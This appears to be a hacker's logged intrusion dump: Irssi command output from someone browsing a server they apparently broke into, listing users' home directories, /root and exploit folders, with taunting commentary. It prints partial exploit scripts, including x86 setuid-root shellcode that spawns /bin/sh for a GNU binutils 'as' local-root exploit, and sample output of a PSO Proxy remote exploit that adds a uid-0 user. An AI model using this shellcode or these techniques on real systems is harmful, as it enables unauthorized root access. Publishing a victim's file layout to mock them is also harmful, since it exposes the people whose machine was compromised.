14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/portbinding
14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/portbinding.c
14:32 /home/posidron/dump/bytecode/shellcodes/lnx-bind
14:32 /home/posidron/dump/bytecode/shellcodes/lnx-bind.c
14:32 /home/posidron/dump/bytecode/shellcodes/ppc/bsd-execve_binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/ppc/linux-execve_binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/sco/execve_binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/sco/execve_binsh2.c
14:32 /home/posidron/dump/bytecode/shellcodes/sco/portbinding.c
14:32 /home/posidron/dump/bytecode/shellcodes/solaris-x86/bindshell.txt
14:32 /home/posidron/dump/bytecode/shellcodes/solaris-x86/execve-binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/solaris-x86/portbinding.c
14:32 /home/posidron/dump/bytecode/shellcodes/sparc/portbind.c
14:32 /home/posidron/dump/bytecode/shellcodes/sparc/portbinding.c
14:32 /home/posidron/dump/bytecode/shellcodes/win/w00w00-bindshell.c
14:32 /home/publisher/bin14:32 /home/publisher/bin/bbs_audits_a
14:32 /home/publisher/bin/bbs_audits_p14:32 /home/publisher/bin/bbs_audits_s
14:32 /home/publisher/bin/bbs_bb_a
14:32 /home/publisher/bin/bbs_bb_p
14:32 /home/publisher/bin/bbs_bb_s
14:32 /home/publisher/bin/bbs_bytecode_a
14:32 /home/publisher/bin/bbs_bytecode_p
14:32 /home/publisher/bin/bbs_bytecode_s
14:32 /home/publisher/bin/bbs_chat
14:32 /home/publisher/bin/bbs_exploits_a
14:32 /home/publisher/bin/bbs_exploits_p
14:32 /home/publisher/bin/bbs_exploits_s
14:32 /home/publisher/bin/bbs_options_c
14:32 /home/publisher/bin/bbs_papers_a
14:32 /home/publisher/bin/bbs_papers_p
14:32 /home/publisher/bin/bbs_papers_s
14:32 /home/publisher/bin/bbs_snipplets_a
14:32 /home/publisher/bin/bbs_snipplets_p
14:32 /home/publisher/bin/bbs_snipplets_s
14:32 /home/publisher/bin/bbs_tools_a
14:32 /home/publisher/bin/bbs_tools_p
14:32 /home/publisher/bin/bbs_tools_s
14:32 /home/publisher/bin/bbs_whois
14:32 /home/sirphreak/0x80/x80/src/mod/gseen.mod/generic_binary_tree.c
14:32 /home/sirphreak/x80/eggdrop1.6.16/src/mod/gseen.mod/generic_binary_tree.c
14:32 /home/posidron/code/admiral/database
14:32 /home/posidron/code/admiral/database/db_debian
14:32 /home/posidron/code/admiral/database/db_frsirt
14:32 /home/posidron/code/admiral/include/database.h
14:32 /home/posidron/code/admiral/src/database.c
14:32 /home/posidron/code/admiral/src/database.c.save
14:32 /home/posidron/code/admiral/src/database.c.save.1
14:32 /home/posidron/code/backup/database
14:32 /home/posidron/code/backup/include/database.h
14:32 /home/posidron/code/backup/src/database.c
14:32 /home/publisher/database
14:32 /home/publisher/database/audits
14:32 /home/publisher/database/audits/serial
14:32 /home/publisher/database/blackboard
14:32 /home/publisher/database/blackboard/serial
14:32 /home/publisher/database/bytecode
14:32 /home/publisher/database/bytecode/serial
14:32 /home/publisher/database/exploits
14:32 /home/publisher/database/exploits/serial
14:32 /home/publisher/database/papers
14:32 /home/publisher/database/papers/serial
14:32 /home/publisher/database/snipplets
14:32 /home/publisher/database/snipplets/0
14:32 /home/publisher/database/snipplets/1
14:32 /home/publisher/database/snipplets/serial
14:32 /home/publisher/database/tools
14:32 /home/publisher/database/tools/serial
14:32 /home/setnf/pfprintd-0.5/src/database.c
14:32 /home/publisher
14:32 /home/publisher/.bash_history
14:32 /home/publisher/.irssi
14:32 /home/publisher/.irssi/config
14:32 /home/publisher/ansi
14:32 /home/publisher/ansi/audits.menu
14:32 /home/publisher/ansi/blackboard.menu
14:32 /home/publisher/ansi/bytecode.menu
14:32 /home/publisher/ansi/exploits.menu
14:32 /home/publisher/ansi/main.menu
14:32 /home/publisher/ansi/options.menu
14:32 /home/publisher/ansi/papers.menu
14:32 /home/publisher/ansi/snipplets.menu
14:32 /home/publisher/ansi/tools.menu
14:32 /home/publisher/ascii
14:32 /home/publisher/ascii/audits.menu
14:32 /home/publisher/ascii/bytecode.menu
14:32 /home/publisher/ascii/exploits.menu
14:32 /home/publisher/ascii/main.menu
14:32 /home/publisher/ascii/options.menu
14:32 /home/publisher/ascii/papers.menu
14:32 /home/publisher/ascii/snipplets.menu
14:32 /home/publisher/ascii/tools.menu
14:32 /home/publisher/bin
14:32 /home/publisher/bin/bbs_audits_a
14:32 /home/publisher/bin/bbs_audits_p
14:32 /home/publisher/bin/bbs_audits_s
14:32 /home/publisher/bin/bbs_bb_a
14:32 /home/publisher/bin/bbs_bb_p
14:32 /home/publisher/bin/bbs_bb_s
14:32 /home/publisher/bin/bbs_bytecode_a
14:32 /home/publisher/bin/bbs_bytecode_p
14:32 /home/publisher/bin/bbs_bytecode_s
14:32 /home/publisher/bin/bbs_chat
14:32 /home/publisher/bin/bbs_exploits_a
14:32 /home/publisher/bin/bbs_exploits_p
14:32 /home/publisher/bin/bbs_exploits_s
14:32 /home/publisher/bin/bbs_options_c
14:32 /home/publisher/bin/bbs_papers_a
14:32 /home/publisher/bin/bbs_papers_p
14:32 /home/publisher/bin/bbs_papers_s
14:32 /home/publisher/bin/bbs_snipplets_a
14:32 /home/publisher/bin/bbs_snipplets_p
14:32 /home/publisher/bin/bbs_snipplets_s
14:32 /home/publisher/bin/bbs_tools_a
14:32 /home/publisher/bin/bbs_tools_p
14:32 /home/publisher/bin/bbs_tools_s
14:32 /home/publisher/bin/bbs_whois
14:32 /home/publisher/database
14:32 /home/publisher/database/audits
14:32 /home/publisher/database/audits/serial
14:32 /home/publisher/database/blackboard
14:32 /home/publisher/database/blackboard/serial
14:32 /home/publisher/database/bytecode
14:32 /home/publisher/database/bytecode/serial
14:32 /home/publisher/database/exploits
14:32 /home/publisher/database/exploits/serial
14:32 /home/publisher/database/papers
14:32 /home/publisher/database/papers/serial
14:32 /home/publisher/database/snipplets
14:32 /home/publisher/database/snipplets/0
14:32 /home/publisher/database/snipplets/1
14:32 /home/publisher/database/snipplets/serial
14:32 /home/publisher/database/tools
14:32 /home/publisher/database/tools/serial
14:32 /home/publisher/publisher
14:32 /home/publisher/scripts
14:32 /home/publisher/scripts/audits.menu
14:32 /home/publisher/scripts/blackboard.menu
14:32 /home/publisher/scripts/bytecode.menu
14:32 /home/publisher/scripts/exploits.menu
14:32 /home/publisher/scripts/main.menu
14:32 /home/publisher/scripts/options.menu
14:32 /home/publisher/scripts/papers.menu
14:32 /home/publisher/scripts/snipplets.menu
14:32 /home/publisher/scripts/tools.menu
14:32 /home/phyro/eggdrop/scripts
14:32 /home/phyro/eggdrop/scripts/action.fix.tcl
14:32 /home/phyro/eggdrop/scripts/alltools.tcl
14:32 /home/phyro/eggdrop/scripts/autobotchk
14:32 /home/phyro/eggdrop/scripts/botchk
14:32 /home/phyro/eggdrop/scripts/cmd_resolve.tcl
14:32 /home/phyro/eggdrop/scripts/compat.tcl
14:32 /home/phyro/eggdrop/scripts/CONTENTS
14:32 /home/phyro/eggdrop/scripts/getops.tcl
14:32 /home/phyro/eggdrop/scripts/klined.tcl
14:32 /home/phyro/eggdrop/scripts/notes2.tcl
14:32 /home/phyro/eggdrop/scripts/ques5.tcl
14:32 /home/phyro/eggdrop/scripts/sentinel.tcl
14:32 /home/phyro/eggdrop/scripts/userinfo.tcl
14:32 /home/phyro/eggdrop/scripts/weed
14:32 /home/phyro/installed/phyro/scripts
14:32 /home/phyro/installed/phyro/scripts/action.fix.tcl
14:32 /home/phyro/installed/phyro/scripts/alltools.tcl
14:32 /home/phyro/installed/phyro/scripts/autobotchk
14:32 /home/phyro/installed/phyro/scripts/botchk
14:32 /home/phyro/installed/phyro/scripts/cmd_resolve.tcl
14:32 /home/phyro/installed/phyro/scripts/compat.tcl
14:32 /home/phyro/installed/phyro/scripts/CONTENTS
14:32 /home/phyro/installed/phyro/scripts/getops.tcl
14:32 /home/phyro/installed/phyro/scripts/help
14:32 /home/phyro/installed/phyro/scripts/help/cmd_resolve.help
14:32 /home/phyro/installed/phyro/scripts/help/msg
14:32 /home/phyro/installed/phyro/scripts/help/msg/userinfo.help
14:32 /home/phyro/installed/phyro/scripts/help/userinfo.help
14:32 /home/phyro/installed/phyro/scripts/klined.tcl
14:32 /home/phyro/installed/phyro/scripts/Makefile
14:32 /home/phyro/installed/phyro/scripts/Makefile.in
14:32 /home/phyro/installed/phyro/scripts/notes2.tcl
14:32 /home/phyro/installed/phyro/scripts/ques5.tcl
14:32 /home/phyro/installed/phyro/scripts/sentinel.tcl
14:32 /home/phyro/installed/phyro/scripts/userinfo.tcl
14:32 /home/phyro/installed/phyro/scripts/weed
14:32 /home/posidron/audit/drivers/hpoj-0.91/scripts
14:32 /home/posidron/audit/drivers/hpoj-0.91/scripts/ptal-cups.in
14:32 /home/posidron/audit/drivers/hpoj-0.91/scripts/ptal-init.in
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/compile
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/config.guess
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/config.rpath
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/config.sub
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/depcomp
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/elisp-comp
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/generr.awk
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.4
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.4/guile-doc-snarf
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.4/guile-func-name-check
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.4/guile-snarf.awk
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.4/Makefile
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.4/Makefile.am
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.4/Makefile.in
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.6
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.6/guile-doc-snarf
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.6/guile-doc-snarf.awk
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.6/Makefile
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.6/Makefile.am
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.6/Makefile.in
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/install-sh
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/ltmain.sh
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/mailutils.spec
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/mailutils.spec.in
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/Makefile
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/Makefile.am
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/Makefile.in
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/mdate-sh
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/missing
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/mkinstalldirs
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/sqlmod.sh
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/texify.sed
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/texinfo.tex
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/ylwrap
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/address.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/addr_is_all.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/addr_is_domain.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/addr_is_local.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/addr_matches.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/allof00.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/allof01.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/allof11.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/anyof00.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/anyof01.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/anyof11.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/discard.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/DISTFILES
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/envelope1.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/exists1.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/exists2.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/exists3.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/false.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/fileinto.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/header-mime.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/header1.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/header2.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/header3.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/i-casemap-contains.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/i-casemap-is.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/i-casemap-matches.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/i-casemap-regex.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/i-numeric-contains.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/i-numeric-is.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/i-octet-contains.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/i-octet-is.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/i-octet-matches.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/i-octet-regex.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/keep.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/mul-addr.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/not.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/null.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/numaddr.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/redirect.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/reject.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/rel-address.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/rel-hairy.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/rel-header.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/size1.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/size2.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/stop.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/true.sv
14:32 /home/posidron/dump/scripts
14:32 /home/posidron/dump/scripts/audit_log
14:32 /home/posidron/dump/scripts/canoo.sh
14:32 /home/posidron/dump/scripts/debug.c
14:32 /home/publisher/scripts
14:32 /home/publisher/scripts/audits.menu
14:32 /home/publisher/scripts/blackboard.menu
14:32 /home/publisher/scripts/bytecode.menu
14:32 /home/publisher/scripts/exploits.menu
14:32 /home/publisher/scripts/main.menu
14:32 /home/publisher/scripts/options.menu
14:32 /home/publisher/scripts/papers.menu
14:32 /home/publisher/scripts/snipplets.menu
14:32 /home/publisher/scripts/tools.menu
14:32 /home/sirphreak/0x80/x80/scripts
14:32 /home/sirphreak/0x80/x80/scripts/action.fix.tcl
14:32 /home/sirphreak/0x80/x80/scripts/alltools.tcl
14:32 /home/sirphreak/0x80/
14:32 -!- Irssi: process 0 (locate * |grep home) terminated with return code 0 

WHERE THE FUCK IS THE 0DAYS AT!?

[14:33]/exec locate exploit

14:33 /home/fourtrax/exploit
14:33 /home/fourtrax/exploit.c
14:33 /home/fourtrax/exploit2.c
14:33 /home/posidron/dump/exploits
14:33 /home/posidron/dump/exploits/core
14:33 /home/posidron/dump/exploits/html
14:33 /home/posidron/dump/exploits/html/de
14:33 /home/posidron/dump/exploits/html/de/broadcast.html
14:33 /home/posidron/dump/exploits/html/de/chaninfo.html
14:33 /home/posidron/dump/exploits/html/de/connections.html
14:33 /home/posidron/dump/exploits/html/de/images
14:33 /home/posidron/dump/exploits/html/de/images/play.png
14:33 /home/posidron/dump/exploits/html/de/images/small-logo.png
14:33 /home/posidron/dump/exploits/html/de/index.html
14:33 /home/posidron/dump/exploits/html/de/login.html
14:33 /home/posidron/dump/exploits/html/de/logout.html
14:33 /home/posidron/dump/exploits/html/de/peercast.css
14:33 /home/posidron/dump/exploits/html/de/relayinfo.html
14:33 /home/posidron/dump/exploits/html/de/relays.html
14:33 /home/posidron/dump/exploits/html/de/settings.html
14:33 /home/posidron/dump/exploits/html/de/viewlog.html
14:33 /home/posidron/dump/exploits/html/en
14:33 /home/posidron/dump/exploits/html/en/broadcast.html
14:33 /home/posidron/dump/exploits/html/en/chaninfo.html
14:33 /home/posidron/dump/exploits/html/en/connections.html
14:33 /home/posidron/dump/exploits/html/en/images
14:33 /home/posidron/dump/exploits/html/en/images/play.png
14:33 /home/posidron/dump/exploits/html/en/images/small-logo.png
14:33 /home/posidron/dump/exploits/html/en/index.html
14:33 /home/posidron/dump/exploits/html/en/login.html
14:33 /home/posidron/dump/exploits/html/en/logout.html
14:33 /home/posidron/dump/exploits/html/en/peercast.css
14:33 /home/posidron/dump/exploits/html/en/relayinfo.html
14:33 /home/posidron/dump/exploits/html/en/relays.html
14:33 /home/posidron/dump/exploits/html/en/settings.html
14:33 /home/posidron/dump/exploits/html/en/viewlog.html
14:33 /home/posidron/dump/exploits/html/fr
14:33 /home/posidron/dump/exploits/html/fr/broadcast.html
14:33 /home/posidron/dump/exploits/html/fr/chaninfo.html
14:33 /home/posidron/dump/exploits/html/fr/connections.html
14:33 /home/posidron/dump/exploits/html/fr/images
14:33 /home/posidron/dump/exploits/html/fr/images/play.png
14:33 /home/posidron/dump/exploits/html/fr/images/small-logo.png
14:33 /home/posidron/dump/exploits/html/fr/index.html
14:33 /home/posidron/dump/exploits/html/fr/login.html
14:33 /home/posidron/dump/exploits/html/fr/logout.html
14:33 /home/posidron/dump/exploits/html/fr/peercast.css
14:33 /home/posidron/dump/exploits/html/fr/relayinfo.html
14:33 /home/posidron/dump/exploits/html/fr/relays.html
14:33 /home/posidron/dump/exploits/html/fr/settings.html
14:33 /home/posidron/dump/exploits/html/fr/viewlog.html
14:33 /home/posidron/dump/exploits/html/ja
14:33 /home/posidron/dump/exploits/html/ja/broadcast.html
14:33 /home/posidron/dump/exploits/html/ja/chaninfo.html
14:33 /home/posidron/dump/exploits/html/ja/connections.html
14:33 /home/posidron/dump/exploits/html/ja/images
14:33 /home/posidron/dump/exploits/html/ja/images/play.png
14:33 /home/posidron/dump/exploits/html/ja/images/small-logo.png
14:33 /home/posidron/dump/exploits/html/ja/index.html
14:33 /home/posidron/dump/exploits/html/ja/login.html
14:33 /home/posidron/dump/exploits/html/ja/logout.html
14:33 /home/posidron/dump/exploits/html/ja/peercast.css
14:33 /home/posidron/dump/exploits/html/ja/relayinfo.html
14:33 /home/posidron/dump/exploits/html/ja/relays.html
14:33 /home/posidron/dump/exploits/html/ja/settings.html
14:33 /home/posidron/dump/exploits/html/ja/viewlog.html
14:33 /home/posidron/dump/exploits/imap4d
14:33 /home/posidron/dump/exploits/imap4d/backup
14:33 /home/posidron/dump/exploits/imap4d/backup/psimap4d_backup.c
14:33 /home/posidron/dump/exploits/imap4d/backup/psimap4d_backup_2.c
14:33 /home/posidron/dump/exploits/imap4d/backup/psimap4d_backup_3.c
14:33 /home/posidron/dump/exploits/imap4d/backup/psimap4d_backup_4.c
14:33 /home/posidron/dump/exploits/imap4d/core
14:33 /home/posidron/dump/exploits/imap4d/imap4d
14:33 /home/posidron/dump/exploits/imap4d/psimap4d.c
14:33 /home/posidron/dump/exploits/imap4d/psimap4d.ct
14:33 /home/posidron/dump/exploits/peercast
14:33 /home/posidron/dump/wargame/ats6_exploit.c
14:33 /home/publisher/ansi/exploits.menu
14:33 /home/publisher/ascii/exploits.menu
14:33 /home/publisher/bin/bbs_exploits_a
14:33 /home/publisher/bin/bbs_exploits_p
14:33 /home/publisher/bin/bbs_exploits_s
14:33 /home/publisher/database/exploits
14:33 /home/publisher/database/exploits/serial
14:33 /home/publisher/scripts/exploits.menu
14:33 /home/rushjo/labs.gotfault.org/level1-exploit
14:33 /home/rushjo/labs.gotfault.org/level1-exploit.c
14:33 /root/temp/trapdown/include/exploits.h
14:33 /root/temp/trapdown/include/info_exploits.h
14:33 /root/temp/trapdown/include/show_exploits.h
14:33 /root/temp/trapdown/src/info_exploits.c
14:33 /root/temp/trapdown/src/show_exploits.c
14:33 /var/www/gotfault.org/exploits
14:33 /var/www/gotfault.org/exploits/gotfault-lcdproc.c
14:33 /var/www/gotfault.org/exploits/gotfault-psoproxy.c
14:33 /var/www/nutshell.gotfault.org/exploits
14:33 /var/www/nutshell.gotfault.org/exploits/flow-as.pl
14:33 /var/www/nutshell.gotfault.org/exploits/flow-bar.pl
14:33 /var/www/nutshell.gotfault.org/exploits/flow-compress.pl
14:33 /var/www/nutshell.gotfault.org/exploits/flow-kon.pl
14:33 /var/www/nutshell.gotfault.org/exploits/flow-psoproxy.pl
14:33 /var/www/nutshell.gotfault.org/exploits/flow-sox-rh.pl
14:33 /var/www/nutshell.gotfault.org/exploits/flow-sox-slack.pl
14:33 /var/www/nutshell.gotfault.org/exploits/picasmpoc.pl
14:33 /var/www/nutshell.gotfault.org/exploits/picasmxpl.pl
14:33 /var/www/setnf.gotfault.org/exploits
14:33 /var/www/setnf.gotfault.org/exploits/gotfault-lcdproc.c
14:33 /var/www/setnf.gotfault.org/exploits/gotfault-pcwsd.c
14:33 /var/www/setnf.gotfault.org/exploits/gotfault-psoproxy.c
14:33 -!- Irssi: process 0 (locate exploit) terminated with return code 0

WHAT THE FUCK KIND OF 0DAY IS THAT, LETS HAVE A LOOK AT SOME MORE.

/exec cat /var/www/nutshell.gotfault.org/exploits/flow-as.pl

14:33 #!/usr/bin/perl 14:32 # _____ _ 14:33 # | ___| | _____ __ 14:33 # | |_ | |/ _ \ \ /\ / / 14:33 # | _| | | (_) \ V V / 14:33 # |_| |_|\___/ \_/\_/
14:33 # Security group. 14:33 # 14:33 # Description: as local root exploit 14:33 # if /usr/bin/as == suid - (www.flowsecurity.org) 14:33 # 14:33 # Gnu
binutils <= 2.14 14:33 # 14:33 # Successfull tested on: 14:33 # Slackware 9.0 14:33 # RedHat 8.0 14:33 # 14:33 # Author: Carlos Carvalho -
nutshell@flowsecurity.org 14:33 14:33 $shellcode = #setuid0 by nutshell 14:33 I "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80". 14:33 I #shellcode 14:33 I
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88". 14:33 I "\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3". 14:33 I "\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31". 14:33 I
"\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff".
14:33 I     "\xff\xff/bin/sh";	## y0u w1sh y0u c0uld h4v3 4ll t3h c0d3 d0nt j00!
14:33 -!- Irssi: process 0 (cat /var/www/nutshell.gotfault.org/exploits/flow-as.pl) terminated with return code 0

/exec cat /var/www/nutshell.gotfault.org/exploits/flow-psoproxy.pl      <-- A YEAR OLD?

14:33 #!/usr/bin/perl 14:33 # _____ _ 14:33 # | ___| | _____ ___ 14:33 # | |_ | |/ _ \ \ /\ / / 14:33 # | _| | | (_) \ V V / 14:33 # |_| |_|\___/ \_/\_/
14:33 # Security Group. 14:33 # 14:33 # Description: flow-psoproxy.pl 14:33 # PSO Proxy 0.91 (Linux) remote possible root exploit 14:33 # 14:33 #
Advisory: 14:33 # http://www.autistici.org/fdonato/advisory/PSOProxy0.91-adv.txt 14:33 # 14:33 # In truth this package sucks, i`ve found 14:33 # no
package source at all, 14:33 # and bindport has strange behavior 14:33 # so i`ve decided to only 14:33 # add user x with uid 0: 14:33 # 14:33 #
nutshell@scarface:~$ ./flow-psoproxy.pl 192.168.1.10 8080 14:33 # [*] Sending data... 14:33 # [!] Data has been sent 14:33 # [!] PSO Proxy 0.91 (Linux)
Remote exploit 14:33 # [!] x added as uid0 on localhost . 14:33 # [!] Psoproxy sucks 14:33 # nutshell@scarface:~$ ssh x@localhost 14:33 # Last login:
Sat Jan 8 01:41:39 2005 from localhost 14:33 # Could not chdir to home directory : No such file or directory 14:33 # root@scarface:/# 14:33 # 14:33 # Or
you can exploit it localy: 14:33 # 14:33 # nutshell@scarface:~$ ./flow-psoproxy.pl 127.0.0.1 8080 14:33 # flow-psoproxy.pl 14:33 # [*] Using address:
0xbf7ff108 14:33 # [*] Sending data... 14:33 # [!] Data has been sent 14:33 # [!] PSO Proxy 0.91 (Linux) Remote exploit 14:33 # [!] x added as uid0 on
localhost . 14:33 # [!] Psoproxy sucks 14:33 # nutshell@scarface:~$ su x 14:33 # root@scarface:/# id 14:33 # uid=0(root) gid=0(root) groups=0(root)
14:33 # root@scarface:/# 14:33 # 14:33 # Author: nuTshell <nutshell@flowsecurity.org> 14:33 # 14:33 # Sat Jan 8 02:05:00 BRST 2005
14:33 #
14:33 -!- Irssi: process 0 (cat /var/www/nutshell.gotfault.org/exploits/flow-psoproxy.pl) terminated with return code 0


/exec locate /root/

14:33 /root/.bashrc
14:33 /root/.bash_history
14:33 /root/.BitchX
14:33 /root/.BitchX/BitchX.away
14:33 /root/.BitchX/screens
14:33 /root/.cedit
14:33 /root/.cedit/cooledit.macros
14:33 /root/.cedit/Syntax
14:33 /root/.irssi
14:33 /root/.irssi/config
14:33 /root/.links
14:33 /root/.links/socket
14:33 /root/.mc
14:33 /root/.mc/history
14:33 /root/.mc/Tree
14:33 /root/.mysql_history
14:33 /root/.nano_history
14:33 /root/.profile
14:33 /root/.rnd
14:33 /root/.ssh
14:33 /root/.ssh/known_hosts
14:33 /root/.viminfo
14:33 /root/backup
14:33 /root/bind-slave
14:33 /root/bind-slave/.cvsignore
14:33 /root/bind-slave/.settings
14:33 /root/bind-slave/.systype
14:33 /root/bind-slave/bin
14:33 /root/bind-slave/bin/addr
14:33 /root/bind-slave/bin/addr/.cvsignore
14:33 /root/bind-slave/bin/addr/addr
14:33 /root/bind-slave/bin/addr/addr.c
14:33 /root/bind-slave/bin/addr/addr.o
14:33 /root/bind-slave/bin/addr/Makefile
14:33 /root/bind-slave/bin/dig
14:33 /root/bind-slave/bin/dig/.cvsignore
14:33 /root/bind-slave/bin/dig/dig
14:33 /root/bind-slave/bin/dig/dig.c
14:33 /root/bind-slave/bin/dig/dig.o
14:33 /root/bind-slave/bin/dig/Makefile
14:33 /root/bind-slave/bin/dnskeygen
14:33 /root/bind-slave/bin/dnskeygen/.cvsignore
14:33 /root/bind-slave/bin/dnskeygen/dnskeygen
14:33 /root/bind-slave/bin/dnskeygen/dnskeygen.c
14:33 /root/bind-slave/bin/dnskeygen/dnskeygen.o
14:33 /root/bind-slave/bin/dnskeygen/Makefile
14:33 /root/bind-slave/bin/dnsquery
14:33 /root/bind-slave/bin/dnsquery/.cvsignore
14:33 /root/bind-slave/bin/dnsquery/dnsquery
14:33 /root/bind-slave/bin/dnsquery/dnsquery.c
14:33 /root/bind-slave/bin/dnsquery/dnsquery.o
14:33 /root/bind-slave/bin/dnsquery/Makefile
14:33 /root/bind-slave/bin/host
14:33 /root/bind-slave/bin/host/.cvsignore
14:33 /root/bind-slave/bin/host/host
14:33 /root/bind-slave/bin/host/host.c
14:33 /root/bind-slave/bin/host/host.o
14:33 /root/bind-slave/bin/host/Makefile
14:33 /root/bind-slave/bin/irpd
14:33 /root/bind-slave/bin/irpd/.cvsignore
14:33 /root/bind-slave/bin/irpd/irpd
